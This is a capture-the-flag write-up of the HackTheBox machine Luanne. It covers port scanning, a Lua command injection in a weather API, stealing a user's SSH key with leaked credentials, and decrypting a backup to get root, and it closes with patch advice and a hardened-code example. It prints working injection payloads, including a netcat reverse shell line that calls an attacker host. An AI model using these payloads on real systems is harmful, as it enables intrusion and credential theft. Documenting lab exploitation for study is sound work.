Hackthebox Luanne WriteUp

Jim Solomon
5 min read · Mar 27, 2021

Overview:

Luanne is a great easy BSD machine. The foothold is a vulnerable Lua weather script running on the web server that allows code execution. A backend server then exposes the user's id_rsa file, which can be pulled with curl using the web API user's credentials. Last, there is an encrypted backup file in the user's home folder; the netpgp tool already present on the box decrypts it and yields the root password. The concepts of this box are not complicated, but it still requires dedicated enumeration to find a way in. With all that being said, let's jump in!

Reconnaissance:

# Nmap 7.91 scan initiated Thu Mar 25 10:08:15 2021 as: nmap -sC -sV -oN sc -vv 10.10.10.218
Increasing send delay for 10.10.10.218 from 0 to 5 due to 44 out of 145 dropped probes since last increase.
Increasing send delay for 10.10.10.218 from 5 to 10 due to 64 out of 213 dropped probes since last increase.
Nmap scan report for 10.10.10.218
Host is up, received echo-reply ttl 254 (0.19s latency).
Scanned at 2021-03-25 10:08:15 EDT for 205s
Not shown: 997 closed ports
Reason: 997 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey:
| 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
| 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
| ecdsa-sha2-nistp521 AAAAE2VjZHNhLXNoYTItbmlzdHA1MjEAAAAIbmlzdHA1MjEAAACFBAFlwEzim2pzpW7PYcDQB8EQCWPSUxYMK/Tv0fgtPIMkiLepeDQ2WTEdtBnAGRg0CBp6MRM8RR6M+dUeMy9Zm02hpgFjEjNrcXstpm2mS+8axgwxoT2A5F/hkMms6ckkjfMhdLHom+8ZlHPFcX5MWl1cIIuH+A+RGZuJNb6QpEIvguSV/A==
| 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMDw96/CWlrLxN0y9RAm9LU3MPNEJOYbJlzMxzUutOIQ
80/tcp open http syn-ack ttl 63 nginx 1.19.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=.
| http-methods:
|_ Supported Methods: GET HEAD POST
| http-robots.txt: 1 disallowed entry
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open http syn-ack ttl 63 Medusa httpd 1.12 (Supervisor process manager)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

The foothold:

Port 80

Curling the URL shows that it redirects to a backend server on 127.0.0.1:3000.

Port 9001

The realm name "default" may indicate default credentials.

Googling "Medusa httpd 1.12 (Supervisor process manager) default credentials" turned up the documentation linked below.

https://readthedocs.org/projects/supervisor/downloads/pdf/latest/

Supervisor 4.2.0

https://pypi.org/project/supervisor/

Searched for exploits but found nothing.

Looking at the process list, there is a weather.lua API running on the web server.

So, back to port 80: sending it to Burp shows a forecast directory with a city parameter.

The error indicates the server is running a Lua weather script. Checking GTFOBins for the lua binary shows a shell escape function.

Having tried many command injections, I found that the payload below gives code execution.

city=list');os.execute("id")--

Reverse shell payload:

London');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.x.x 443>/tmp/f")--

PrivEsc:

curl 10.10.14.28/linpeas.sh -o linpeas.sh

Found the password iamthebest for webapi_user.

Logging in to port 80 with it doesn't show much information.

Remember that curling port 80 earlier redirected to a backend server on port 3000, so check the listening ports on the machine.

$ ls -l /home
total 4
dr-xr-x--- 7 r.michaels users 512 Sep 16 2020 r.michaels

Use the webapi credentials to curl user r.michaels's id_rsa:

curl --user webapi_user:iamthebest 127.0.0.1:3001/~r.michaels/id_rsa
root@kali:~/htb/boxes/luanne# chmod 600 key.txt
root@kali:~/htb/boxes/luanne# ssh -i key.txt r.michaels@10.10.10.218
Last login: Fri Sep 18 07:06:51 2020
NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020
Welcome to NetBSD!

PrivEsc to root:

There is an encrypted backup file; use the netpgp present on the machine to decrypt it and write the output to a temporary file.

netpgp --decrypt evel_backup-2020-09-16.tar.gz.enc --output=/home/r.michaels/backups/test.tar.gz

Found another webapi credential in it, so use john to crack it again.

It should be the root password, so try su root with it, BUT:

luanne$ su root
su: You are not listed in the correct secondary group (wheel) to su root.
su: Sorry: Authentication error
luanne$

After searching for an alternative way to achieve the same thing, I found that doas does it.

luanne$ doas su root
Password:
sh: Cannot determine current working directory
# id
uid=0(root) gid=0(wheel) groups=0(wheel),2(kmem),3(sys),4(tty),5(operator),20(staff),31(guest),34(nvmm)
# whoami & hostname
root
luanne.htb

Patch the vulnerabilities:

  1. Fix the input sanitisation check on line 49 of the Lua weather script to prevent code execution.
  2. Remove the id_rsa and other sensitive information from the backend server.
  3. Remove the encrypted backup file.
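To make fix 1 concrete, here is an added illustration (not the box's weather.lua, whose source is not on this page) of the injection class behind the city payload shown in the foothold section: a handler that splices the parameter into Lua source, next to a hardened handler that validates it and does a plain lookup. The names forecasts, lookup, mark, forecast_vulnerable and forecast_safe are assumptions of this example, and it needs Lua 5.2 or later for load() with an environment table.

```lua
-- Added example, not the box's real weather.lua. Sketches the bug class:
-- user input concatenated into a Lua chunk that is then executed.

local forecasts = { London = "rain", Paris = "sun" }
local injected = false        -- becomes true only if injected code runs

-- Vulnerable: the raw parameter lands inside a quoted Lua string and the
-- whole chunk is executed. A value such as  list');mark()--  closes the
-- string, appends its own statement and comments out the trailing quote,
-- which is exactly the shape of the page's os.execute payload.
local function forecast_vulnerable(city)
  local chunk = "result = lookup('" .. city .. "')"
  local env = {
    lookup = function(c) return forecasts[c] or "unknown city" end,
    mark   = function() injected = true end,   -- stands in for os.execute
  }
  local fn, err = load(chunk, "weather", "t", env)
  if not fn then return nil, err end
  fn()
  return env.result
end

-- Hardened: enforce a tight allow-pattern (letters, spaces, hyphens) and a
-- length bound, and never hand the parameter to load(); a table lookup is
-- all the feature needs.
local function forecast_safe(city)
  if type(city) ~= "string" or #city == 0 or #city > 40
     or not city:match("^[%a%s%-]+$") then
    return nil, "invalid city parameter"
  end
  return forecasts[city] or "unknown city"
end

-- Constructed inputs: a normal request and an injection string in the same
-- shape as the page's payload, using the harmless mark() in place of os.execute.
local benign  = "London"
local hostile = "list');mark()--"

print(forecast_vulnerable(benign))
print(forecast_vulnerable(hostile))
print("injected code ran (vulnerable):", injected)

injected = false
print(forecast_safe(benign))
print(forecast_safe(hostile))
print("injected code ran (hardened):", injected)
```

The vulnerable handler returns a forecast for the hostile input while flipping the marker, whereas the hardened handler rejects the same input before any code is built.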

Jim Solomon

Christian, Studying Cyber Security and Digital Forensics, Security Consultant at 12security.com | OSCP